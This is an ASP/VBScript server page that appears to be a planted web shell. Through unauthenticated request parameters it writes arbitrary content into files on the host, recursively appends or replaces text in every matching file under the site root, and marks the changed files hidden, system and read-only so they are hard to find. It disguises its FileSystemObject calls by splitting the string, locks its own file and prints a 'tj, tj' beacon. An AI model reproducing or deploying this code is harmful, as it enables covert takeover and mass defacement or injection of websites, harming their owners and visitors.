<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%><% dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplace,read content=request("content") path=request("path") file=request("file") task=request("task") paths=request("paths") nnfilename=request("nnfilename") htmlpath=request("htmlpath") addcontent=request("addcontent") includefiles=request("includefiles") noincludefiles=request("noincludefiles") filetype=request("filetype") recontent=request("recontent") hanfiles=request("hanfiles") site_root=request("site_root") defaulthtml=request("defaulthtml") defaultreplace=request("defaultreplace") read=request("read") IF site_root="" or site_root=null then site_root = Server.MapPath("/") End IF if task="1" Then paths_str = split(paths,",") nn = 0 for i=0 to (ubound(paths_str)) if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) Then readfile_("/"&paths_str(i)&"/"&nnfilename) WriteIn Server.MapPath("/")&"/"&paths_str(i)&"/"&nnfilename,content Response.write "/"&paths_str(i)&"/"&nnfilename&"|" readfile("/"&paths_str(i)&"/"&nnfilename) nn = nn +1 end if Next if nn=0 Then dpath = mulu(Server.MapPath("/"),defaulthtml) CFolder("/"&dpath) readfile_("/"&dpath&"/"&nnfilename) WriteIn Server.MapPath("/")&"/"&dpath&"/"&nnfilename,content Response.write "/"&dpath&"/"&nnfilename&"|" readfile("/"&dpath&"/"&nnfilename) end If ElseIf task="2" Then paths_str = split(paths,",") nn = 0 for i=0 to (ubound(paths_str)) if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) And nn=0 Then htmlpath_ = paths_str(i) nn = nn +1 end if Next if nn=0 Then htmlpath_ = mulu(Server.MapPath("/"),defaulthtml) if CFolder("/"&htmlpath_)=1 then readfolder("/"&htmlpath_) end if end If if request("htmlpath")<>"" Then htmlpath_str = split(htmlpath,"/") nn = 0 for i=0 to (ubound(htmlpath_str)) htmlpath_ = htmlpath_&"/"&htmlpath_str(i) if CFolder("/"&htmlpath_)=1 then readfolder("/"&htmlpath_) end if Next end If readfile_("/"&htmlpath_&"/"&nnfilename) content = Replace(content,"SITE_URL","http://"&Request.ServerVariables("SERVER_NAME")&"/"&htmlpath_&"/"&nnfilename) WriteIn Server.MapPath("/")&"/"&htmlpath_&"/"&nnfilename,content Response.write "<sbj:url>"&"/"&htmlpath_&"/"&nnfilename&"</sbj:url>" readfile5("/"&htmlpath_&"/"&nnfilename) ElseIf task="3" Then IF instr(site_root, "|")>0 Then site_root_str = split(site_root,"|") nn = 0 for i=0 to (ubound(site_root_str)) if IsFloderExist(site_root_str(i)) then Bianlireplate site_root_str(i),addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles end if Next Else Bianlireplate site_root,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles End IF ElseIf task="4" Then IF instr(site_root, "|")>0 Then site_root_str = split(site_root,"|") nn = 0 for i=0 to (ubound(site_root_str)) if IsFloderExist(site_root_str(i)) then Bianli site_root_str(i) end if Next Else Bianli site_root End IF Else Response.write "tj,"&" tj" If IsObjInstalled("Scripting.FileSystemObject") Then Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") set f=fso.Getfile(server.mappath(Request.ServerVariables("SCRIPT_NAME"))) if f.attributes <> 1 Then f.attributes = 1 end If set fso = Nothing end If end If %> <% Function IsObjInstalled(strClassString) On Error Resume Next IsObjInstalled = False Err = 0 Dim xTestObj Set xTestObj = Server.CreateObject(strClassString) If 0 = Err Then IsObjInstalled = True Set xTestObj = Nothing Err = 0 End Function %> <% function readfile(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(Server.MapPath(testfile)) Then '???????? set f=fso.Getfile(Server.MapPath(testfile)) if f.attributes <> 7 Then f.attributes = 7 end If end If set fso = Nothing end Function function readfolder(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(Server.MapPath(testfile)) Then '???????? set f=fso.getfolder(Server.MapPath(testfile)) if f.attributes <> 7 Then f.attributes = 7 end If end if set fso = Nothing end Function function readfile_(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(Server.MapPath(testfile)) Then '???????? set f=fso.Getfile(Server.MapPath(testfile)) if f.attributes <> 0 Then f.attributes = 0 end If end if set fso = Nothing end Function function readfolder_(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(Server.MapPath(testfile)) Then '???????? set f=fso.getfolder(Server.MapPath(testfile)) if f.attributes <> 0 Then f.attributes = 0 end If end if set fso = Nothing end Function function readfile5(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(Server.MapPath(testfile)) Then '???????? set f=fso.Getfile(Server.MapPath(testfile)) if f.attributes <> 5 Then f.attributes = 5 end If end If set fso = Nothing end Function function readfolder5(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(Server.MapPath(testfile)) Then '???????? set f=fso.getfolder(Server.MapPath(testfile)) if f.attributes <> 5 Then f.attributes = 5 end If end if set fso = Nothing end Function function readfile6(testfile,attid) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(Server.MapPath(testfile)) Then '???????? set f=fso.Getfile(Server.MapPath(testfile)) if f.attributes <> attid Then f.attributes = attid end If end If set fso = Nothing end Function ''''''''''''''''''''''''''''''''' function readfile_new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(testfile) Then '???????? set f=fso.Getfile(testfile) if f.attributes <> 7 Then f.attributes = 7 end If end If set fso = Nothing end Function function readfolder_new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(testfile) Then '???????? set f=fso.getfolder(testfile) if f.attributes <> 7 Then f.attributes = 7 end If end if set fso = Nothing end Function function readfile__new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(testfile) Then '???????? set f=fso.Getfile(testfile) if f.attributes <> 0 Then f.attributes = 0 end If end if set fso = Nothing end Function function readfolder__new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(testfile) Then '???????? set f=fso.getfolder(testfile) if f.attributes <> 0 Then f.attributes = 0 end If end if set fso = Nothing end Function function readfile5_new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(testfile) Then '???????? set f=fso.Getfile(testfile) if f.attributes <> 5 Then f.attributes = 5 end If end If set fso = Nothing end Function function readfolder5_new(testfile) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FolderExists(testfile) Then '???????? set f=fso.getfolder(testfile) if f.attributes <> 5 Then f.attributes = 5 end If end if set fso = Nothing end Function function readfile6_new(testfile,attid) Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") If fso.FileExists(testfile) Then '???????? set f=fso.Getfile(testfile) if f.attributes <> attid Then f.attributes = attid end If end If set fso = Nothing end Function %> <% Function mulu(path,defaulthtml) Set Fso=server.createobject("scripting.filesystemobject") On Error Resume Next Set Objfolder=fso.getfolder(path) Set Objsubfolders=objfolder.subfolders Dim mulu_item,iii mulu_item = "html" iii = 0 For Each Objsubfolder In Objsubfolders Nowpath= Objsubfolder.name mulu_item = Nowpath Next IF defaulthtml<>"" then mulu_item = defaulthtml End IF mulu = mulu_item Set Objfolder=nothing Set Objsubfolders=nothing Set Fso=nothing End Function Function Bianli(path) Set Fso=server.createobject("scripting.filesystemobject") On Error Resume Next Set Objfolder=fso.getfolder(path) Set Objsubfolders=objfolder.subfolders For Each Objsubfolder In Objsubfolders Nowpath=path + "\" + Objsubfolder.name Set Objfiles=objsubfolder.files For Each Objfile In Objfiles Next Bianli(nowpath)'?? Next Set Objfolder=nothing Set Objsubfolders=nothing Set Fso=nothing End Function Function Bianlireplate(path,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles) Set Fso=server.createobject("scripting.filesystemobject") On Error Resume Next Set Objfolder=fso.getfolder(path) Set Objfiles_1=Objfolder.files For Each Objfile In Objfiles_1 ftype = getFileExt(Objfile.name) aaa=instr(filetype,"."&ftype&".") turet = False If includefiles= "" Then turet = true End If If turet Then else true_a=instr(includefiles,Objfile.name) If true_a>0 Then turet = true End If End If IF turet=false then IF hanfiles<>"" and Instr(1, hanfiles, ",") Then set hanfiles_str = split(hanfiles,",") nn = 0 for i=0 to (ubound(hanfiles_str)) if instr(Objfile.name,hanfiles_str(i))>1 then turet = true end if Next End IF End IF if aaa>0 And turet Then codepage = checkcode(path&"/"&Objfile.name) attid = Objfile.attributes readfile__new(path&"/"&Objfile.name) set writeBoolean = false if codepage="utf-8" Or codepage="unicode" Then newf_content = ReadFromTextFile(path&"/"&Objfile.name,"utf-8") bbb=instr(newf_content,addcontent) if bbb>0 Then If recontent="" Then writeBoolean = false Else newf_content = Replace(newf_content,recontent,addcontent) writeBoolean = true End If Else If recontent="" Then newf_content = newf_content&addcontent writeBoolean = true Else newf_content = Replace(newf_content,recontent,addcontent) writeBoolean = true End If end If if writeBoolean = true then WriteIn path&"/"&Objfile.name,newf_content readfile6_new path&"/"&Objfile.name,attid Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13) end IF Else newf_content = b(path&"/"&Objfile.name) bbb=instr(1,newf_content,addcontent,1) if bbb>0 Then If recontent="" Then writeBoolean = false Else newf_content = Replace(newf_content,recontent,addcontent) writeBoolean = true End If Else If recontent="" Then newf_content = newf_content&addcontent writeBoolean = true Else newf_content = Replace(newf_content,recontent,addcontent) writeBoolean = true End If end If if writeBoolean = true then WriteIn1 path&"/"&Objfile.name,newf_content readfile6_new path&"/"&Objfile.name,attid Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13) end IF end if end if Next Set Objsubfolders=objfolder.subfolders For Each Objsubfolder In Objsubfolders Nowpath=path + "\" + Objsubfolder.name Set Objfiles=objsubfolder.files Bianlireplate nowpath,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles '?? Next Set Objfolder=nothing Set Objsubfolders=nothing Set Fso=nothing End Function function checkcode(path) set objstream=server.createobject("adodb.stream") objstream.Type=1 objstream.mode=3 objstream.open objstream.Position=0 objstream.loadfromfile path bintou=objstream.read(2) If AscB(MidB(bintou,1,1))=&HEF And AscB(MidB(bintou,2,1))=&HBB Then checkcode="utf-8" ElseIf AscB(MidB(bintou,1,1))=&HFF And AscB(MidB(bintou,2,1))=&HFE Then checkcode="unicode" Else checkcode="gb2312" End If objstream.close set objstream=nothing end function Function getFileExt(sFileName) getFileExt = Mid(sFileName, InstrRev(sFileName, ".") + 1) End Function %> <% Function IsFloderExist(strFolderName) SET FSO=Server.CreateObject("Scripting.FileSystemObject") IF(FSO.FolderExists(strFolderName))THEN IsFloderExist = True ELSE IsFloderExist = False END IF SET FSO=NOTHING End Function %> <% Function getCode(iCount) ''????????? Dim arrChar Dim j,k,strCode arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789" k=Len(arrChar) Randomize For i=1 to iCount j=Int(k * Rnd )+1 strCode = strCode & Mid(arrChar,j,1) Next getCode = strCode End Function Function Digital(iCount)''????? Dim arrChar Dim j,k,strCode arrChar = "0123456789" k=Len(arrChar) Randomize For i=1 to iCount j=Int(k * Rnd )+1 strCode = strCode & Mid(arrChar,j,1) Next Digital = strCode End Function Function sj_int(ByVal min, ByVal max) ''????? Randomize(Timer) : sj_int = Int((max - min + 1) * Rnd + min) End Function Function Rand(ByVal min, ByVal max) Randomize(Timer) : Rand = Int((max - min + 1) * Rnd + min) End Function %> <% function WriteIn(testfile,msg) 'set fs=server.CreateObject("scripting.filesystemobject") 'set thisfile=fs.CreateTextFile(testfile,True,True) 'thisfile.Write(""&msg& "") ' thisfile.close 'set fs = nothing Set stm = CreateObject("Adodb.Stream") stm.Type = 2 stm.mode = 3 stm.charset = "utf-8" stm.Open stm.WriteText msg stm.SaveToFile testfile, 2 stm.flush stm.Close Set stm = Nothing end Function function WriteIn1(testfile,msg) ' set fs=server.CreateObject("scripting.filesystemobject") ' set thisfile=fs.CreateTextFile(testfile,True) ' thisfile.Write(""&msg& "") ' thisfile.close ' set fs = nothing Set stm = CreateObject("Adodb.Stream") stm.Type = 2 stm.mode = 3 stm.charset = "gb2312" stm.Open stm.WriteText msg stm.SaveToFile testfile, 2 stm.flush stm.Close Set stm = Nothing end Function function delfile(testfile) set fs=server.CreateObject("scripting.filesystemobject") fs.DeleteFile(testfile) set fs = nothing end function %> <% function a(t) set fs=server.createobject("scripting.filesystemobject") file=server.mappath(t) set txt=fs.opentextfile(file,1,true) if not txt.atendofstream then a=txt.ReadAll end if set fs=nothing set txt=nothing end Function function b(file) set fs=server.createobject("scripting.filesystemobject") set txt=fs.opentextfile(file,1,true) if not txt.atendofstream then b=txt.ReadAll end if set fs=nothing set txt=nothing end Function function aa(t) set fs=server.createobject("scripting.filesystemobject") file=server.mappath(t) set txt=fs.opentextfile(file,1,true,-1) if not txt.atendofstream then aa=txt.ReadAll end if set fs=nothing set txt=nothing end Function function bb(file) set fs=server.createobject("scripting.filesystemobject") set txt=fs.opentextfile(file,1,true,-1) if not txt.atendofstream then bb=txt.ReadAll end if set fs=nothing set txt=nothing end function Function ReadFromTextFile(file,CharSet) dim str set stm=CreateObject("adodb.stream") stm.Type=2'?????? stm.mode=3 stm.charset=CharSet stm.open stm.loadfromfile file str=stm.readtext stm.Close set stm=nothing ReadFromTextFile=str End Function %> <% Function CFolder(Filepath) Filepath=server.mappath(Filepath) Set Fso = Server.CreateObject("Scripting.FileSystemObject") If Fso.FolderExists(FilePath) Then CFolder=0 else Fso.CreateFolder(FilePath) CFolder=1 end if Set Fso = Nothing end function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function %>